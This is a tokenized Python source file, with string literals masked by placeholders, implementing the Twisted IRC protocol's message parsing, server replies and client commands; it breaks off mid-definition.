"<STR_LIT>" ) <EOL> def deliverBody ( protocol ) : <EOL> """<STR_LIT>""" <EOL> UNKNOWN_LENGTH = u"<STR_LIT>" <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> import errno , os , random , re , stat , struct , sys , time , types , traceback <EOL> import string , socket <EOL> import warnings <EOL> import textwrap <EOL> from os import path <EOL> from twisted . internet import reactor , protocol , task <EOL> from twisted . persisted import styles <EOL> from twisted . protocols import basic <EOL> from twisted . python import log , reflect , text <EOL> from twisted . python . compat import set <EOL> NUL = chr ( <NUM_LIT:0> ) <EOL> CR = chr ( <NUM_LIT:0> <NUM_LIT:15> ) <EOL> NL = chr ( <NUM_LIT:0> <NUM_LIT:12> ) <EOL> LF = NL <EOL> SPC = chr ( <NUM_LIT:0> <NUM_LIT> ) <EOL> MAX_COMMAND_LENGTH = <NUM_LIT> <EOL> CHANNEL_PREFIXES = '<STR_LIT>' <EOL> class IRCBadMessage ( Exception ) : <EOL> pass <EOL> class IRCPasswordMismatch ( Exception ) : <EOL> pass <EOL> class IRCBadModes ( ValueError ) : <EOL> """<STR_LIT>""" <EOL> def parsemsg ( s ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> trailing = [ ] <EOL> if not s : <EOL> raise IRCBadMessage ( "<STR_LIT>" ) <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> prefix , s = s [ <NUM_LIT:1> : ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> if s . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> s , trailing = s . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> args = s . split ( ) <EOL> args . append ( trailing ) <EOL> else : <EOL> args = s . split ( ) <EOL> command = args . pop ( <NUM_LIT:0> ) <EOL> return prefix , command , args <EOL> def split ( str , length = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return [ chunk <EOL> for line in str . split ( '<STR_LIT:\n>' ) <EOL> for chunk in textwrap . wrap ( line , length ) ] <EOL> def _intOrDefault ( value , default = None ) : <EOL> """<STR_LIT>""" <EOL> if value : <EOL> try : <EOL> return int ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return default <EOL> class UnhandledCommand ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class _CommandDispatcherMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> prefix = None <EOL> def dispatch ( self , commandName , * args ) : <EOL> """<STR_LIT>""" <EOL> def _getMethodName ( command ) : <EOL> return '<STR_LIT>' % ( self . prefix , command ) <EOL> def _getMethod ( name ) : <EOL> return getattr ( self , _getMethodName ( name ) , None ) <EOL> method = _getMethod ( commandName ) <EOL> if method is not None : <EOL> return method ( * args ) <EOL> method = _getMethod ( '<STR_LIT>' ) <EOL> if method is None : <EOL> raise UnhandledCommand ( "<STR_LIT>" % ( _getMethodName ( commandName ) , ) ) <EOL> return method ( commandName , * args ) <EOL> def parseModes ( modes , params , paramModes = ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> """<STR_LIT>""" <EOL> if len ( modes ) == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' ) <EOL> if modes [ <NUM_LIT:0> ] not in '<STR_LIT>' : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> changes = ( [ ] , [ ] ) <EOL> direction = None <EOL> count = - <NUM_LIT:1> <EOL> for ch in modes : <EOL> if ch in '<STR_LIT>' : <EOL> if count == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> direction = '<STR_LIT>' . index ( ch ) <EOL> count = <NUM_LIT:0> <EOL> else : <EOL> param = None <EOL> if ch in paramModes [ direction ] : <EOL> try : <EOL> param = params . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( ch , ) ) <EOL> changes [ direction ] . append ( ( ch , param ) ) <EOL> count += <NUM_LIT:1> <EOL> if len ( params ) > <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , params ) ) <EOL> if count == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> return changes <EOL> class IRC ( protocol . Protocol ) : <EOL> """<STR_LIT>""" <EOL> buffer = "<STR_LIT>" <EOL> hostname = None <EOL> encoding = None <EOL> def connectionMade ( self ) : <EOL> self . channels = [ ] <EOL> if self . hostname is None : <EOL> self . hostname = socket . getfqdn ( ) <EOL> def sendLine ( self , line ) : <EOL> if self . encoding is not None : <EOL> if isinstance ( line , unicode ) : <EOL> line = line . encode ( self . encoding ) <EOL> self . transport . write ( "<STR_LIT>" % ( line , CR , LF ) ) <EOL> def sendMessage ( self , command , * parameter_list , ** prefix ) : <EOL> """<STR_LIT>""" <EOL> if not command : <EOL> raise ValueError , "<STR_LIT>" <EOL> if '<STR_LIT:U+0020>' in command or command [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> raise ValueError , "<STR_LIT>" "<STR_LIT>" % command <EOL> line = string . join ( [ command ] + list ( parameter_list ) ) <EOL> if '<STR_LIT>' in prefix : <EOL> line = "<STR_LIT>" % ( prefix [ '<STR_LIT>' ] , line ) <EOL> self . sendLine ( line ) <EOL> if len ( parameter_list ) > <NUM_LIT:15> : <EOL> log . msg ( "<STR_LIT>" % <EOL> ( len ( parameter_list ) , line ) ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> lines = ( self . buffer + data ) . split ( LF ) <EOL> self . buffer = lines . pop ( ) <EOL> for line in lines : <EOL> if len ( line ) <= <NUM_LIT:2> : <EOL> continue <EOL> if line [ - <NUM_LIT:1> ] == CR : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> prefix , command , params = parsemsg ( line ) <EOL> command = command . upper ( ) <EOL> self . handleCommand ( command , prefix , params ) <EOL> def handleCommand ( self , command , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> method = getattr ( self , "<STR_LIT>" % command , None ) <EOL> try : <EOL> if method is not None : <EOL> method ( prefix , params ) <EOL> else : <EOL> self . irc_unknown ( prefix , command , params ) <EOL> except : <EOL> log . deferr ( ) <EOL> def irc_unknown ( self , prefix , command , params ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( command , prefix , params ) <EOL> def privmsg ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , lowQuote ( message ) ) ) <EOL> def notice ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , message ) ) <EOL> def action ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , message ) ) <EOL> def topic ( self , user , channel , topic , author = None ) : <EOL> """<STR_LIT>""" <EOL> if author is None : <EOL> if topic is None : <EOL> self . sendLine ( '<STR_LIT>' % ( <EOL> self . hostname , RPL_NOTOPIC , user , channel , '<STR_LIT>' ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_TOPIC , user , channel , lowQuote ( topic ) ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( author , channel , lowQuote ( topic ) ) ) <EOL> def topicAuthor ( self , user , channel , author , date ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( <EOL> self . hostname , <NUM_LIT> , user , channel , author , date ) ) <EOL> def names ( self , user , channel , names ) : <EOL> """<STR_LIT>""" <EOL> prefixLength = len ( channel ) + len ( user ) + <NUM_LIT:10> <EOL> namesLength = <NUM_LIT> - prefixLength <EOL> L = [ ] <EOL> count = <NUM_LIT:0> <EOL> for n in names : <EOL> if count + len ( n ) + <NUM_LIT:1> > namesLength : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_NAMREPLY , user , channel , '<STR_LIT:U+0020>' . join ( L ) ) ) <EOL> L = [ n ] <EOL> count = len ( n ) <EOL> else : <EOL> L . append ( n ) <EOL> count += len ( n ) + <NUM_LIT:1> <EOL> if L : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_NAMREPLY , user , channel , '<STR_LIT:U+0020>' . join ( L ) ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFNAMES , user , channel ) ) <EOL> def who ( self , user , channel , memberInfo ) : <EOL> """<STR_LIT>""" <EOL> for info in memberInfo : <EOL> ( username , hostmask , server , nickname , flag , hops , realName ) = info <EOL> assert flag in ( "<STR_LIT:H>" , "<STR_LIT>" ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOREPLY , user , channel , <EOL> username , hostmask , server , nickname , flag , hops , realName ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFWHO , user , channel ) ) <EOL> def whois ( self , user , nick , username , hostname , realName , server , serverInfo , oper , idle , signOn , channels ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISUSER , user , nick , username , hostname , realName ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISSERVER , user , nick , server , serverInfo ) ) <EOL> if oper : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISOPERATOR , user , nick ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISIDLE , user , nick , idle , signOn ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISCHANNELS , user , nick , '<STR_LIT:U+0020>' . join ( channels ) ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFWHOIS , user , nick ) ) <EOL> def join ( self , who , where ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( who , where ) ) <EOL> def part ( self , who , where , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( who , where , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( who , where ) ) <EOL> def channelMode ( self , user , channel , mode , * args ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_CHANNELMODEIS , user , channel , mode , '<STR_LIT:U+0020>' . join ( args ) ) ) <EOL> class ServerSupportedFeatures ( _CommandDispatcherMixin ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . _features = { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : tuple ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT>' : self . _parsePrefixParam ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : self . _parseChanModesParam ( [ '<STR_LIT:b>' , '<STR_LIT>' , '<STR_LIT>' ] ) } <EOL> def _splitParamArgs ( cls , params , valueProcessor = None ) : <EOL> """<STR_LIT>""" <EOL> if valueProcessor is None : <EOL> valueProcessor = lambda x : x <EOL> def _parse ( ) : <EOL> for param in params : <EOL> if '<STR_LIT::>' not in param : <EOL> param += '<STR_LIT::>' <EOL> a , b = param . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> yield a , valueProcessor ( b ) <EOL> return list ( _parse ( ) ) <EOL> _splitParamArgs = classmethod ( _splitParamArgs ) <EOL> def _unescapeParamValue ( cls , value ) : <EOL> """<STR_LIT>""" <EOL> def _unescape ( ) : <EOL> parts = value . split ( '<STR_LIT>' ) <EOL> yield parts . pop ( <NUM_LIT:0> ) <EOL> for s in parts : <EOL> octet , rest = s [ : <NUM_LIT:2> ] , s [ <NUM_LIT:2> : ] <EOL> try : <EOL> octet = int ( octet , <NUM_LIT:16> ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' % ( octet , ) ) <EOL> yield chr ( octet ) + rest <EOL> if '<STR_LIT>' not in value : <EOL> return value <EOL> return '<STR_LIT>' . join ( _unescape ( ) ) <EOL> _unescapeParamValue = classmethod ( _unescapeParamValue ) <EOL> def _splitParam ( cls , param ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT:=>' not in param : <EOL> param += '<STR_LIT:=>' <EOL> key , value = param . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> return key , map ( cls . _unescapeParamValue , value . split ( '<STR_LIT:U+002C>' ) ) <EOL> _splitParam = classmethod ( _splitParam ) <EOL> def _parsePrefixParam ( cls , prefix ) : <EOL> """<STR_LIT>""" <EOL> if not prefix : <EOL> return None <EOL> if prefix [ <NUM_LIT:0> ] != '<STR_LIT:(>' and '<STR_LIT:)>' not in prefix : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> modes , symbols = prefix . split ( '<STR_LIT:)>' , <NUM_LIT:1> ) <EOL> symbols = zip ( symbols , xrange ( len ( symbols ) ) ) <EOL> modes = modes [ <NUM_LIT:1> : ] <EOL> return dict ( zip ( modes , symbols ) ) <EOL> _parsePrefixParam = classmethod ( _parsePrefixParam ) <EOL> def _parseChanModesParam ( self , params ) : <EOL> """<STR_LIT>""" <EOL> names = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if len ( params ) > len ( names ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> len ( names ) , len ( params ) ) ) <EOL> items = map ( lambda key , value : ( key , value or '<STR_LIT>' ) , names , params ) <EOL> return dict ( items ) <EOL> _parseChanModesParam = classmethod ( _parseChanModesParam ) <EOL> def getFeature ( self , feature , default = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _features . get ( feature , default ) <EOL> def hasFeature ( self , feature ) : <EOL> """<STR_LIT>""" <EOL> return self . getFeature ( feature ) is not None <EOL> def parse ( self , params ) : <EOL> """<STR_LIT>""" <EOL> for param in params : <EOL> key , value = self . _splitParam ( param ) <EOL> if key . startswith ( '<STR_LIT:->' ) : <EOL> self . _features . pop ( key [ <NUM_LIT:1> : ] , None ) <EOL> else : <EOL> self . _features [ key ] = self . dispatch ( key , value ) <EOL> def isupport_unknown ( self , command , params ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( params ) <EOL> def isupport_CHANLIMIT ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params , _intOrDefault ) <EOL> def isupport_CHANMODES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _parseChanModesParam ( params ) <EOL> except ValueError : <EOL> return self . getFeature ( '<STR_LIT>' ) <EOL> def isupport_CHANNELLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] , self . getFeature ( '<STR_LIT>' ) ) <EOL> def isupport_CHANTYPES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_EXCEPTS ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] or '<STR_LIT:e>' <EOL> def isupport_IDCHAN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params ) <EOL> def isupport_INVEX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] or '<STR_LIT:I>' <EOL> def isupport_KICKLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_MAXLIST ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return self . _splitParamArgs ( params , _intOrDefault ) <EOL> def isupport_MODES ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> def isupport_NETWORK ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] <EOL> def isupport_NICKLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] , self . getFeature ( '<STR_LIT>' ) ) <EOL> def isupport_PREFIX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . _parsePrefixParam ( params [ <NUM_LIT:0> ] ) <EOL> except ValueError : <EOL> return self . getFeature ( '<STR_LIT>' ) <EOL> def isupport_SAFELIST ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def isupport_STATUSMSG ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return params [ <NUM_LIT:0> ] <EOL> def isupport_TARGMAX ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return dict ( self . _splitParamArgs ( params , _intOrDefault ) ) <EOL> def isupport_TOPICLEN ( self , params ) : <EOL> """<STR_LIT>""" <EOL> return _intOrDefault ( params [ <NUM_LIT:0> ] ) <EOL> class IRCClient ( basic . LineReceiver ) : <EOL> """<STR_LIT>""" <EOL> hostname = None <EOL> motd = None <EOL> nickname = '<STR_LIT>' <EOL> password = None <EOL> realname = None <EOL> username = None <EOL> userinfo = None <EOL> fingerReply = None <EOL> versionName = None <EOL> versionNum = None <EOL> versionEnv = None <EOL> sourceURL = "<STR_LIT>" <EOL> dcc_destdir = '<STR_LIT:.>' <EOL> dcc_sessions = None <EOL> performLogin = <NUM_LIT:1> <EOL> lineRate = None <EOL> _queue = None <EOL> _queueEmptying = None <EOL> delimiter = '<STR_LIT:\n>' <EOL> __pychecker__ = '<STR_LIT>' <EOL> _registered = False <EOL> _attemptedNick = '<STR_LIT>' <EOL> erroneousNickFallback = '<STR_LIT>' <EOL> _heartbeat = None <EOL> heartbeatInterval = <NUM_LIT> <EOL> def _reallySendLine ( self , line ) : <EOL> return basic . LineReceiver . sendLine ( self , lowQuote ( line ) + '<STR_LIT:\r>' ) <EOL> def sendLine ( self , line ) : <EOL> if self . lineRate is None : <EOL> self . _reallySendLine ( line ) <EOL> else : <EOL> self . _queue . append ( line ) <EOL> if not self . _queueEmptying : <EOL> self . _sendLine ( ) <EOL> def _sendLine ( self ) : <EOL> if self . _queue : <EOL> self . _reallySendLine ( self . _queue . pop ( <NUM_LIT:0> ) ) <EOL> self . _queueEmptying = reactor . callLater ( self . lineRate , <EOL> self . _sendLine ) <EOL> else : <EOL> self . _queueEmptying = None <EOL> def connectionLost ( self , reason ) : <EOL> basic . LineReceiver . connectionLost ( self , reason ) <EOL> self . stopHeartbeat ( ) <EOL> def _createHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> return task . LoopingCall ( self . _sendHeartbeat ) <EOL> def _sendHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' + self . hostname ) <EOL> def stopHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _heartbeat is not None : <EOL> self . _heartbeat . stop ( ) <EOL> self . _heartbeat = None <EOL> def startHeartbeat ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopHeartbeat ( ) <EOL> if self . heartbeatInterval is None : <EOL> return <EOL> self . _heartbeat = self . _createHeartbeat ( ) <EOL> self . _heartbeat . start ( self . heartbeatInterval , now = False ) <EOL> def created ( self , when ) : <EOL> """<STR_LIT>""" <EOL> def yourHost ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def myInfo ( self , servername , version , umodes , cmodes ) : <EOL> """<STR_LIT>""" <EOL> def luserClient ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def bounce ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def isupport ( self , options ) : <EOL> """<STR_LIT>""" <EOL> def luserChannels ( self , channels ) : <EOL> """<STR_LIT>""" <EOL> def luserOp ( self , ops ) : <EOL> """<STR_LIT>""" <EOL> def luserMe ( self , info ) : <EOL> """<STR_LIT>""" <EOL> def privmsg ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def joined ( self , channel ) : <EOL> """<STR_LIT>""" <EOL> def left ( self , channel ) : <EOL> """<STR_LIT>""" <EOL> def noticed ( self , user , channel , message ) : <EOL> """<STR_LIT>""" <EOL> def modeChanged ( self , user , channel , set , modes , args ) : <EOL> """<STR_LIT>""" <EOL> def pong ( self , user , secs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def signedOn ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def kickedFrom ( self , channel , kicker , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def nickChanged ( self , nick ) : <EOL> """<STR_LIT>""" <EOL> self . nickname = nick <EOL> def userJoined ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userLeft ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userQuit ( self , user , quitMessage ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userKicked ( self , kickee , channel , kicker , message ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def action ( self , user , channel , data ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def topicUpdated ( self , user , channel , newTopic ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def userRenamed ( self , oldname , newname ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def receivedMOTD ( self , motd ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def join ( self , channel , key = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if key : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , key ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def leave ( self , channel , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def kick ( self , channel , user , reason = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if reason : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , user , reason ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , user ) ) <EOL> part = leave <EOL> def invite ( self , user , channel ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> self . sendLine ( "<STR_LIT>" % ( user , channel ) ) <EOL> def topic ( self , channel , topic = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> if topic != None : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , topic ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( channel , ) ) <EOL> def mode ( self , chan , set , modes , limit = None , user = None , mask = None ) : <EOL> """<STR_LIT>""" <EOL> if set : <EOL> line = '<STR_LIT>' % ( chan , modes ) <EOL> else : <EOL> line = '<STR_LIT>' % ( chan , modes ) <EOL> if limit is not None : <EOL> line = '<STR_LIT>' % ( line , limit ) <EOL> elif user is not None : <EOL> line = '<STR_LIT>' % ( line , user ) <EOL> elif mask is not None : <EOL> line = '<STR_LIT>' % ( line , mask ) <EOL> self . sendLine ( line ) <EOL> def say ( self , channel , message , length = None ) : <EOL> """<STR_LIT>""" <EOL> if channel [ <NUM_LIT:0> ] not in CHANNEL_PREFIXES : <EOL> channel = '<STR_LIT:#>' + channel <EOL> self . msg ( channel , message , length ) <EOL> def _safeMaximumLineLength ( self , command ) : <EOL> """<STR_LIT>""" <EOL> theoretical = '<STR_LIT>' % ( <EOL> '<STR_LIT:a>' * self . supported . getFeature ( '<STR_LIT>' ) , <EOL> '<STR_LIT:b>' * <NUM_LIT:10> , <EOL> '<STR_LIT:c>' * <NUM_LIT> , <EOL> command ) <EOL> fudge = <NUM_LIT:10> <EOL> return MAX_COMMAND_LENGTH - len ( theoretical ) - fudge <EOL> def msg ( self , user , message , length = None ) : <EOL> """<STR_LIT>""" <EOL> fmt = '<STR_LIT>' % ( user , ) <EOL> if length is None : <EOL> length = self . _safeMaximumLineLength ( fmt ) <EOL> minimumLength = len ( fmt ) + <NUM_LIT:2> <EOL> if length <= minimumLength : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( minimumLength , user ) ) <EOL> for line in split ( message , length - minimumLength ) : <EOL> self . sendLine ( fmt + line ) <EOL> def notice ( self , user , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( user , message ) ) <EOL> def away ( self , message = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % message ) <EOL> def back ( self ) : <EOL> """<STR_LIT>""" <EOL> self . away ( ) <EOL> def whois ( self , nickname , server = None ) : <EOL> """<STR_LIT>""" <EOL> if server is None : <EOL> self . sendLine ( '<STR_LIT>' + nickname ) <EOL> else : <EOL> self . sendLine ( '<STR_LIT>' % ( server , nickname ) ) <EOL> def register ( self , nickname , hostname = '<STR_LIT:foo>' , servername = '<STR_LIT:bar>' ) : <EOL> """<STR_LIT>""" <EOL> if self . password is not None : <EOL> self . sendLine ( "<STR_LIT>" % self . password ) <EOL> self . setNick ( nickname ) <EOL> if self . username is None : <EOL> self . username = nickname <EOL> self . sendLine ( "<STR_LIT>" % ( self . username , hostname , servername , self . realname ) ) <EOL> def setNick ( self , nickname ) : <EOL> """<STR_LIT>""" <EOL> self . _attemptedNick = nickname <EOL> self . sendLine ( "<STR_LIT>" % nickname ) <EOL> def quit ( self , message = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % message ) <EOL> def describe ( self , channel , action ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( channel , [ ( '<STR_LIT>' , action ) ] ) <EOL> _pings = None <EOL> _MAX_PINGRING = <NUM_LIT:12> <EOL> def ping ( self , user , text = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _pings is None : <EOL> self . _pings = { } <EOL> if text is None : <EOL> chars = string . letters + string . digits + string . punctuation <EOL> key = '<STR_LIT>' . join ( [ random . choice ( chars ) for i in range ( <NUM_LIT:12> ) ] ) <EOL> else : <EOL> key = str ( text ) <EOL> self . _pings [ ( user , key ) ] = time . time ( ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , key ) ] ) <EOL> if len ( self . _pings ) > self . _MAX_PINGRING : <EOL> byValue = [ ( v , k ) for ( k , v ) in self . _pings . items ( ) ] <EOL> byValue . sort ( ) <EOL> excess = self . _MAX_PINGRING - len ( self . _pings ) <EOL> for i in xrange ( excess ) : <EOL> del self . _pings [ byValue [ i ] [ <NUM_LIT:1> ] ] <EOL> def dccSend ( self , user , file ) : <EOL> if type ( file ) == types . StringType : <EOL> file = open ( file , '<STR_LIT:r>' ) <EOL> size = fileSize ( file ) <EOL> name = getattr ( file , "<STR_LIT:name>" , "<STR_LIT>" % ( id ( file ) , ) ) <EOL> factory = DccSendFactory ( file ) <EOL> port = reactor . listenTCP ( <NUM_LIT:0> , factory , <NUM_LIT:1> ) <EOL> raise NotImplementedError , ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> my_address = struct . pack ( "<STR_LIT>" , my_address ) <EOL> args = [ '<STR_LIT>' , name , my_address , str ( port ) ] <EOL> if not ( size is None ) : <EOL> args . append ( size ) <EOL> args = string . join ( args , '<STR_LIT:U+0020>' ) <EOL> self . ctcpMakeQuery ( user , [ ( '<STR_LIT>' , args ) ] ) <EOL> def dccResume ( self , user , fileName , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( user , [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , fileName , port , resumePos ] ) ] ) <EOL> def dccAcceptResume ( self , user , fileName , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> self . ctcpMakeQuery ( user , [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , fileName , port , resumePos ] ) ] ) <EOL> def irc_ERR_NICKNAMEINUSE ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . _attemptedNick = self . alterCollidedNick ( self . _attemptedNick ) <EOL> self . setNick ( self . _attemptedNick ) <EOL> def alterCollidedNick ( self , nickname ) : <EOL> """<STR_LIT>""" <EOL> return nickname + '<STR_LIT:_>' <EOL> def irc_ERR_ERRONEUSNICKNAME ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> if not self . _registered : <EOL> self . setNick ( self . erroneousNickFallback ) <EOL> def irc_ERR_PASSWDMISMATCH ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> raise IRCPasswordMismatch ( "<STR_LIT>" ) <EOL> def irc_RPL_WELCOME ( self , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> self . hostname = prefix <EOL> self . _registered = True <EOL> self . nickname = self . _attemptedNick <EOL> self . signedOn ( ) <EOL> self . startHeartbeat ( ) <EOL> def irc_JOIN 